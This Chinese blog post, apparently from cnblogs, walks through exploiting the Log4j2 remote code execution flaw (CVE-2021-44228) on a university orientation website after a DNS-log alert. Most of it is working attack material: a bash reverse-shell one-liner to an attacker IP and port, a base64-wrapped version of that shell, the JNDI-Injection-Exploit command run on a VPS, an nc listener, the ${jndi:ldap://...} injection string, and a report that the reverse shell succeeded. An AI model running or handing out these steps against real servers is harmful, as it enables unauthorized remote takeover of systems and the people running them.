【告警发现】
在测一个迎新网站的时候发现态势告警dnslog家族请求,看了一下态势感知mmp,我还没测出洞来呢咋服务器自己请求*kmbs6r7ovd.burpcollaborator.net日志了,
根据域名搜了一下日志没有发现,然后看了一下服务器的相关日志,在告警服务器请求bp域名之前是“Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)”的日志。
【工具准备】
1.jndi工具:https://github.com/sayers522/JNDI-Injection-Exploit
反弹shell payload
bash -i >& /dev/tcp/12211.222.22.48/6666 0>&1
2.base64编码在线:https://ares-x.com/tools/runtime-exec
bash -c {echo,YmFzaCAtaSA+xxxxxxxxxjEuMzYuMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
3.在vps开启jndi服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAxxxxxxxxMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "121.36.111.48"
4.在vps上监听反弹shell端口
nc -lvvp 6666
【测试】
5.在每一个点测试payload
${jndi:ldap://asssssasdasdas/poc}
url编码
6.服务器加载恶意class类
7.反弹shell成功
态势告警
【参考链接】
payload
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
标签:渗透,com,base64,无意,服务器,日志,log4j2,告警,bash From: https://www.cnblogs.com/lyh1/p/17847049.html